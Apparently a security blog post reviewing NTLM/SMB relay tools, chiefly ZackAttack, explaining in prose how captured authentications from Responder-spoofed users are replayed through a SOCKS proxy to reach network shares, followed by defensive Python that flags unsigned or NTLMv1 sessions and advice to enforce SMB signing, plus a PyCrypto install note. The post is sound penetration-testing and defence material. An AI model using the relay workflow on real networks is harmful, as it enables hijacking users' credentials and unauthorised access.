Current Tools:
“Soft” relay tools:

Now, some would argue that you just spin up the relay at a target then leave it until one pops. I’m not really a fan of that. You will not only be creating multiple access attempt log entries, but you are also just throwing away all of those user authentication attempts. There are 3 tools that agree with me.

Squirtle

Squirtle is awesome plus it’s written in a language I understand (ruby) but it has one serious downfall, many of the post-auth features are left up to the user to develop. It does have a great API but needs some coding to get to do certain things.

Intercepter-NG

I have tested Intercepter-NG out a lot and it has some fantastic features, not to mention that it does relaying on a Windows host, which is impressive all by itself (due to 445 default bind). My only problem with it is that it’s closed source. But definitely recommended.

Zack Attack

The 3rd is a tool called “ZackAttack” by Zack Fasel, you can find it here on GitHub: ZackAttack. You can find the video of the talk releasing this tool on Youtube. So what is so special about this tool? Other than the fact that most of the web interface is broken horribly it has this amazing bit of code that acts as a SOCKS proxy. This SOCKS proxy identifies SMB or HTTP traffic that has NTLM authentication going on and rewrites it based on captured sessions.

What does this mean? If I use SpiderLab’s Responder, for instance, to spoof/get/fake a bunch of users into connecting to my machine via automatic or forced methods to the capture/keep services that ZackAttack spins up, I can then run smbclient or Outlook or Web browser, push it through the ZackAttack SOCKS proxy, pick a username out of the captured names, and use any password I want when asked, and the SOCKS proxy will automatically replace it en route with the valid session information.

This way I can use every authentication that comes in to its highest potential for pwnage. The video below shows how this can be used to connect to a “Network share”

Update: One thing to mention that ZackAttack does that I haven’t seen other tools do, even Squirtle or Intercepter-NG is getting 3+ successful authentications out of a single relay from a user. ZackAttack does this with some clever HTTP Keep-Alive and SMB “reauth” kung fu.
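The property every tool above depends on is that the NTLMSSP blob is the same whether it rides inside SMB or an HTTP Authorization header, and a monitor on the defensive side reads it for the same reason: to see which sessions are relayable. The Python below is an added example, not code from the post or from any of the tools it names. It parses an NTLM AUTHENTICATE_MESSAGE (type 3, field layout per MS-NLMP) to pull out domain, user and workstation, tells NTLMv1 from NTLMv2 by the response length, and checks whether signing was negotiated; sessions without signing are the ones a relay can forward to SMB. The two messages it parses are constructed with a small builder in the block (response bytes are filler; the domain and user names are the ones from this blog's lab), and OEM-encoded strings are assumed to be ASCII.

```python
import base64
import struct
from typing import Optional

# NegotiateFlags from MS-NLMP 2.2.2.5
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_SIGN = 0x00000010
NEGOTIATE_SEAL = 0x00000020
NEGOTIATE_NTLM = 0x00000200
NEGOTIATE_ALWAYS_SIGN = 0x00008000
NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000

SIGNATURE = b"NTLMSSP\x00"
AUTHENTICATE = 3


def _field(msg: bytes, off: int) -> bytes:
    """Read a (Len, MaxLen, BufferOffset) descriptor and return the bytes it points at."""
    ln, _mx, boff = struct.unpack_from("<HHI", msg, off)
    return msg[boff:boff + ln]


def from_http_authorization(header: str) -> Optional[bytes]:
    """HTTP carries the same NTLMSSP blob as SMB, base64-encoded after 'NTLM '."""
    scheme, _, blob = header.strip().partition(" ")
    if scheme.upper() != "NTLM" or not blob:
        return None
    try:
        return base64.b64decode(blob, validate=True)
    except ValueError:
        return None


def parse_authenticate(msg: bytes) -> Optional[dict]:
    """Parse an NTLM AUTHENTICATE_MESSAGE (type 3); None if the bytes are not one."""
    if len(msg) < 64 or msg[:8] != SIGNATURE:
        return None
    if struct.unpack_from("<I", msg, 8)[0] != AUTHENTICATE:
        return None
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"   # OEM strings assumed ASCII
    nt_resp = _field(msg, 20)
    return {
        "domain": _field(msg, 28).decode(enc, "replace"),
        "user": _field(msg, 36).decode(enc, "replace"),
        "workstation": _field(msg, 44).decode(enc, "replace"),
        "flags": flags,
        "signing_negotiated": bool(flags & (NEGOTIATE_SIGN | NEGOTIATE_ALWAYS_SIGN)),
        "ntlmv2": len(nt_resp) > 24,      # an NTLMv1 NtChallengeResponse is exactly 24 bytes
        "anonymous": len(nt_resp) == 0,
    }


def assess(auth: dict) -> list:
    """Conditions worth alerting on: unsigned sessions can be relayed, NTLMv1 is cheap to crack."""
    issues = []
    if not auth["anonymous"] and not auth["signing_negotiated"]:
        issues.append("no_signing")
    if not auth["anonymous"] and not auth["ntlmv2"]:
        issues.append("ntlmv1")
    return issues


def build_authenticate(domain, user, workstation, nt_response, flags=NEGOTIATE_UNICODE) -> bytes:
    """Assemble a minimal type-3 message (no Version/MIC) so the parser has input. Test helper."""
    header_len = 64
    chunks = [b"", nt_response, domain.encode("utf-16-le"),
              user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    fields, payload = b"", b""
    for c in chunks:
        fields += struct.pack("<HHI", len(c), len(c), header_len + len(payload))
        payload += c
    return SIGNATURE + struct.pack("<I", AUTHENTICATE) + fields + struct.pack("<I", flags) + payload


# Constructed samples: a 48-byte NTLMv2-shaped response without signing, and a 24-byte
# NTLMv1-shaped response with signing negotiated.
SAMPLE_UNSIGNED_V2 = build_authenticate(
    "SITTINGDUCK", "user", "WKS01", b"\x11" * 16 + b"\x01\x01" + b"\x00" * 30,
    flags=NEGOTIATE_UNICODE | NEGOTIATE_NTLM | NEGOTIATE_EXTENDED_SESSIONSECURITY)
SAMPLE_SIGNED_V1 = build_authenticate(
    "SITTINGDUCK", "user", "WKS01", b"\x22" * 24,
    flags=NEGOTIATE_UNICODE | NEGOTIATE_NTLM | NEGOTIATE_SIGN | NEGOTIATE_ALWAYS_SIGN)
SAMPLE_HTTP_HEADER = "NTLM " + base64.b64encode(SAMPLE_UNSIGNED_V2).decode("ascii")

if __name__ == "__main__":
    for blob in (SAMPLE_UNSIGNED_V2, from_http_authorization(SAMPLE_HTTP_HEADER), SAMPLE_SIGNED_V1):
        auth = parse_authenticate(blob)
        print(auth["domain"], auth["user"], auth["workstation"], assess(auth))
```

Enforcing SMB signing on the servers (and Extended Protection on the HTTP side) is what turns the "no_signing" finding into a non-event: a relayed session that cannot sign is rejected by the target.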


Other References:

I tried finding all the original/semi original references about SMB (LM/NTLM) Relaying. If you have others please leave a comment below so I can add them to the list.

Installing PyCrypto on OSX Mavericks

Keeping it here for notes and just in case anyone else runs into this same issue.

brew install pip
sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future pip install pycrypto

If you have a better way please leave a comment below!